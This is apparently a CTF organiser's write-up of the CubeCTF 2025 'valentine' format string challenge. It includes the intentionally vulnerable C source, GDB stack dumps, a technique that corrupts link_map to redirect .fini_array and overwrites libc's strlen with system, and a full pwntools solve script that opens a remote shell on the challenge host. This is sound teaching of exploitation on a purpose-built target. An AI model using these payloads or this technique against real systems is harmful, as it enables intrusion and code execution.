CubeCTF 2025 - valentine

cracking a format string golf gauntlet

The premier matchmaking solution for the future.

nc valentine.chal.cubectf.com 42042

valentine.zip

Last weekend, I helped to organize CubeCTF with some of my friends from the US Cyber Team. I worked with eoncrypt to create the challenge valentine, which was a cool format string pwnable that required combining a few different tricks to solve. Originally, we wrote this challenge for an US Cyber Team potluck CTF that happened on Valentine’s day, hence the theming :P.

The challenge ended up being one of two unsolved challenges at the end of the CTF, but afterwards @white701 from UofTCTF solved it (albeit with an unintended solution 🙃).

Challenge overview

We provided players with the challenge source code, which is nicely commented! 😁

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

const char fmt[] = "                  ,d88b.d88b,  \n"
                   "                  88888888888  \n"
                   "                  'Y8888888Y   \n"
                   "                    'Y888Y'    \n"
                   "                      'Y'      \n"
                                         "%*s      \n"
                   "                will u be mine?\n\n";

char* valentine;
int name_len, valentine_len;

int main() {
  setbuf(stdin, NULL);  // ignore
  setbuf(stdout, NULL); // ignore

  char name[24];          // sadly, you and your valentine
  valentine = malloc(24); // are eternally separated by
                          // unmapped memory

  printf("who is your valentine? ");
  scanf("%23[^\n]%*c", valentine);
  printf("what is your name? ");
  scanf("%23[^\n]%*c", name);

  name_len = strlen(name);
  valentine_len = strlen(valentine);

  if (name_len > 23 || valentine_len > 23) { // super secret proprietary algorithm
    printf("unfortunately, %1s and %1s are not compatible.\n", name, valentine);
    _exit(-1);
  }

  printf(name); // bridge the gap between you and your valentine
  printf(", here is your card for %1s:\n\n", valentine);
  printf(fmt, 24+valentine_len/2, valentine); // this isn't vulnerable i promise

  return 0;
}

The vulnerability here is pretty clear; there’s an obvious format string vulnerability when the name variable is printed out. There’s a bit of extra functionality: we control a 23-byte buffer on the heap (the valentine variable) in addition to our 23-byte name buffer on the stack. But the gist of the problem is simple: we must create a 23-byte format string payload that will lead to code execution.

Exploitation

To turn this format string vulnerability into code execution, we must have two things:

  1. An information leak, to bypass ASLR. This is because libc is loaded at a random address.
  2. A function pointer to overwrite, preferably with a controlled argument. This will allow us to call system("sh").

One caveat–we only get one call to printf with the format string vulnerability. And at the time we have to supply our input, we do not know the location of libc. So really, our first step would be to get a second pass at the format string vulnerability. This means that we must get a leak, and at the same time, somehow call the main() function again.

How can we do this? There are a few different ways–let’s list out a few ideas that come to mind:

  • We could overwrite the GOT, but the only function called after our format string vulnerability is printf. And stack canaries are disabled, so overwriting __stack_chk_fail is not an option. Overwriting printf would be useless, because we would destroy any future calls to printf, including any chance we had at getting to use the format string vulnerability again.
  • We could overwrite the return pointer on the stack using a technique like that used in still-printf or stiller-printf. But, that requires not using positional operators, meaning that we must have a long chain of format specifiers (i.e. %c%c%c%c) to access pointer chains further down the stack. Because we only have 23 bytes of space, this probably isn’t an option.
  • We could overwrite .fini_array, an array that holds the destructors for the binary, that runs on exit, like in this writeup. But that won’t work – in newer versions of GCC, .fini_array is placed in a read-only area of memory, even if only partial RELRO is enabled. So, we won’t have any luck overwriting .fini_array.

Or will we?

When the linker sets up a function, in this version (and in many previous versions) of GLIBC, it pushes a pointer onto the stack, pointing to struct link_map. The following is the struct definition, found at https://man7.org/linux/man-pages/man3/dlinfo.3.html.

struct link_map {
    ElfW(Addr) l_addr;     /* Difference between the
                              address in the ELF file and
                              the address in memory */
    char *l_name;          /* Absolute pathname where
                              object was found */
    ElfW(Dyn) *l_ld;       /* Dynamic section of the
                              shared object */
    struct link_map *l_next, *l_prev;
                           /* Chain of loaded objects */
    /* Plus additional fields private to the
       implementation */
};

With format string vulnerabilities, we have the %n specifier, which lets us write to a pointer stored on the stack. Because there is a pointer to link_map on the stack, we can write to the first 8 bytes of link_map. This is the l_addr field, which is the difference between the address in the ELF file and the address in memory where it is loaded. Because this binary is compiled without PIE, the addresses in memory are equal to the addresses in the binary, so l_addr is initially 0. But if we write to l_addr, we shift by an arbitrary offset where the linker resolves objects to!

Here’s where .fini_array comes in. It’s resolved by the linker during the exit sequence. But if l_addr was changed, we can change where .fini_array resolves to. This includes the page of writable memory (the .bss section) conveniently located right after .fini_array in memory. So, by adding a small offset to l_addr, we can change where .fini_array is, and possibly point it somewhere we control.

Stage 1: Returning to main, with a leak

To successfully return to main with a net gain of information, we must do three things:

  1. Shift the location of .fini_array to writable memory in the .bss section by writing an offset to l_addr. We choose .bss because it is at a constant offset from the original location of .fini_array, and is located after the original location in memory.
  2. Write the address of main to the new location of .fini_array.
  3. Get a libc address printed out so that we can defeat ASLR.

That’s a lot to get done in only 23 characters of format string! There’s some information we need before we get our format string, so we go to GDB and set a breakpoint at the vulnerable printf call. Then, we can view the stack:

$rsp  0x7fffffffdd38|+0x0000|+000: 0x00000000004012f6 <main+0x120>  ->  0x4800002d63058b48  <-  retaddr[1]
$rdi  0x7fffffffdd40|+0x0008|+001: 0x732074616d726f66 'format string goes here'
      0x7fffffffdd48|+0x0010|+002: 0x6f6720676e697274 'tring goes here'
      0x7fffffffdd50|+0x0018|+003: 0x0065726568207365 ('es here'?)
      0x7fffffffdd58|+0x0020|+004: 0x0000000000000000
$rbp  0x7fffffffdd60|+0x0028|+005: 0x0000000000000001
      0x7fffffffdd68|+0x0030|+006: 0x00007ffff7ddd510  ->  0xe80001b0e9e8c789  <-  retaddr[2]
      0x7fffffffdd70|+0x0038|+007: 0x0000000000000000
      0x7fffffffdd78|+0x0040|+008: 0x00000000004011d6 <main>  ->  0xe5894855fa1e0ff3
      0x7fffffffdd80|+0x0048|+009: 0x0000000100000000
      0x7fffffffdd88|+0x0050|+010: 0x00007fffffffde78  ->  0x00007fffffffe121  ->  0x752f632f746e6d2f '/mnt/c/users/ethan/downloads/valentine/vuln'  <-  $rbx
      0x7fffffffdd90|+0x0058|+011: 0x00007fffffffde78  ->  0x00007fffffffe121  ->  0x752f632f746e6d2f '/mnt/c/users/ethan/downloads/valentine/vuln'  <-  $rbx
      0x7fffffffdd98|+0x0060|+012: 0x56aeff2870d033e1
      0x7fffffffdda0|+0x0068|+013: 0x0000000000000000
      0x7fffffffdda8|+0x0070|+014: 0x00007fffffffde88  ->  0x00007fffffffe14d  ->  0x622f3d4c4c454853 'SHELL=/bin/bash'  <-  $r13
      0x7fffffffddb0|+0x0078|+015: 0x0000000000403e00 <__do_global_dtors_aux_fini_array_entry>  ->  0x00000000004011a0 <__do_global_dtors_aux>  ->  0x2ead3d80fa1e0ff3  <-  $r14
      0x7fffffffddb8|+0x0080|+016: 0x00007ffff7ffd020 <_rtld_global>  ->  0x00007ffff7ffe2e0  ->  0x0000000000000000  <-  $r15
      0x7fffffffddc0|+0x0088|+017: 0xa95100d7ca3233e1
      0x7fffffffddc8|+0x0090|+018: 0xa9511093d95a33e1
      0x7fffffffddd0|+0x0098|+019: 0x0000000000000000
      0x7fffffffddd8|+0x00a0|+020: 0x0000000000000000
      0x7fffffffdde0|+0x00a8|+021: 0x0000000000000000
      0x7fffffffdde8|+0x00b0|+022: 0x00007fffffffde78  ->  0x00007fffffffe121  ->  0x752f632f746e6d2f '/mnt/c/users/ethan/downloads/valentine/vuln'  <-  $rbx
      0x7fffffffddf0|+0x00b8|+023: 0x00007fffffffde78  ->  0x00007fffffffe121  ->  0x752f632f746e6d2f '/mnt/c/users/ethan/downloads/valentine/vuln'  <-  $rbx
      0x7fffffffddf8|+0x00c0|+024: 0x4a70c8164fec4b00  <-  canary
      0x7fffffffde00|+0x00c8|+025: 0x0000000000000000
      0x7fffffffde08|+0x00d0|+026: 0x00007ffff7ddd5c9 <__libc_start_main+0x89>  ->  0x4d001d29a03d8b4c  <-  retaddr[3]
      0x7fffffffde10|+0x00d8|+027: 0x00000000004011d6 <main>  ->  0xe5894855fa1e0ff3
      0x7fffffffde18|+0x00e0|+028: 0x0000000000403e00 <__do_global_dtors_aux_fini_array_entry>  ->  0x00000000004011a0 <__do_global_dtors_aux>  ->  0x2ead3d80fa1e0ff3  <-  $r14
      0x7fffffffde20|+0x00e8|+029: 0x00007ffff7ffe2e0  ->  0x0000000000000000

With some experimentation, we get that the format string %6$p returns back the start of our format string. With that index in mind, we find that the pointer to link_map at 0x00007ffff7ffe2e0 can be accessed through index 34. We also notice that at 0x7fffffffdd78, or index 13, there is a pointer to main. This will come in handy later. Finally, we also can get the address of .fini_array by running readelf -A ./vuln | grep .fini_array, to get that it is at 0x403e00.

So, our initial format string takes on the form "%4198870c%8$n%00000c%34$n" + p64(bss_address), with the first %c being the address of main, and the second %c being how much we want to shift .fini_array by (the 0s are placeholders). However, this is too long, as we still need to fit in our 23 characters the address to write &main to (referred to here as index 8). But as we noticed before, the address of main is already on the stack! We can thus trim down characters here if we instead use the %*c specifier to take the number of characters to print directly off the stack from index 13.

So, our format string becomes "%*13$c%8$n%34$hn" + p64(bss_address). We save additional space here by writing only 2 bytes to l_addr, and by allowing the same value to be written to .bss as to l_addr. This is because we can control where &main is written by changing the address we supply after the format string, so we just choose to write &main to original_fini + &main & 0xffff. This means that we do not need an extra %c specifier, and save even more space. At this point, our format string is 16 + 8 = 24 bytes long, but we can truncate it by a byte because the last bytes are a pointer and should be null bytes (and scanf’s %23[^\n] specifier will add a 24th byte as a null terminator). So, we fit within the limit, and can call main as the program exits!

But what about the leak? That’s actually pretty simple now because we get lucky with the register layout in the program. It turns out that the second “argument” to our vulnerable printf call (as it is uninitialized, this is just whatever happened to be in the rsi register) happens to be a libc address! So, we change our first %c to a %p to get our final format string of "%*13$c%8$n%34$hn" + p64(bss_address).

With this, we have a working payload that when put into the name input of the program, will lead to the main function being called again, letting us exploit the format string again with a leak.

Stage 2: Arbitrary libc write to RCE

Now, our next step is to turn this into RCE. Our format string vulnerability basically gives us an arbitrary write, and because we have a leak of a libc address, we can write anywhere in libc.

To get code execution, we are going to control rdi to call system("sh"). Thankfully, the libc GOT is a good target for this. printf will internally call strlen on each of its string arguments, and it is a GOT entry in libc. Notice the third print statement below from vuln.c.

Why not use a one_gadget? As we were developing this challenge, I was working under the assumption that we would be using a newer version of libc, where one_gadgets tend to be pretty bad. Most of them use code from posix_spawn, which crashes the shell after a very short time (meaning that we have to win a weird race condition to send commands to the shell). However, it turned out that the pointer to link_map no longer exists on the stack in newer versions of libc, so we ended up using an older libc that did have a nice execve gadget. This was a little oversight that was later used in UofTCTF’s unintended solution.
printf(name); // bridge the gap between you and your valentine  
printf(", here is your card for %1s:\n\n", valentine);  
printf(fmt, 24+valentine_len/2, valentine);

In the last call to printf here, at some point internally, strlen(valentine) is called. Since we control the value of valentine, if we overwrite strlen with system, we can call system("sh"). We perform this overwrite with a simple format string writing payload, writing 4 bytes to partial overwrite strlen to system.

There’s a bit of a problem here, though: to overwrite a 4-byte value with a format string, we have to print the equivalent number of characters out to the terminal. This would mean writing a 32-bit number of whitespace characters and having the program send it over the network. This just won’t do; network latencies are too slow (and even if they aren’t, I’m too impatient), and the chances that my internet will drop out or I’ll hit some sort of timeout on the remote instance are just too high.

But here ASLR is our friend. Because memory addresses are randomized, the lower 32 bits of the address of system will be randomized too! So, it is likely that by chance, those lower 32 bits will be a small number. And because we know the address of system after getting our leak, we can just abort and try again if the address is too big, without having to print a massive number of characters if it is. Running our exploit in a loop until the last 4 bytes of the system address are below 0x10000000 ends being more time-efficient than waiting for one larger address to go through.

Putting it all together, we get our final solve script:

from pwn import *

context.binary = elf = ELF("./vuln")
libc = ELF("./libc.so.6")

done = False
while not done:
	conn = remote("valentine.chal.cubectf.com", 42042)
	conn.sendline(b"???")
	conn.sendline(b"%*13$p%8$n%34$hn" + p64(0x403e00 + (elf.sym.main & 0xffff))[:-1])
	conn.recvuntil(b"0x")
	libc.address = int(conn.recv(12),16) - 0x1f6b03
	to_write = libc.sym.system & 0xffffffff
	info("libc @ " + hex(libc.address))
	info("got @ " + hex(libc.address+0x1f6000))
	info("to write: " + hex(to_write))
	if to_write > 0x10000000 or to_write>>24 == 0xa:
	    conn.close()
	    continue
	done = True
	info("managable write, continuing")
	conn.recvuntil(b"card for")
	conn.sendline(b"sh")
	conn.sendline(f"`%{(libc.sym.system & 0xffffffff)-2}c%8$n".encode().ljust(16,b"a") + p64(libc.address+0x1f6080)[:-1])
	conn.sendline(b"echo hi")
	conn.recvuntil(b"hi")
	conn.interactive()

With that, we get our flag: cube{l0v3_will_find_4_w4y_thr0ugh_p4ths_wh3r3_w0lv3s_f34r_t0_pr3y_48699d8d2a8191fc} (when you can’t come up with a flag, just find a random quote from one of the many quote websites out there)

Thanks to everyone who attempted this challenge; I hope you learned something cool from this challenge, even if you spent way too long banging your head against it. I personally find format string exploits as really fun puzzles, and I hope that you can too :)

Thanks also to B00TK1D for running this CTF smoothly and for providing so much of the admin support during the CTF. And thanks again to eoncrypt for helping write both the challenge and this blog post writeup!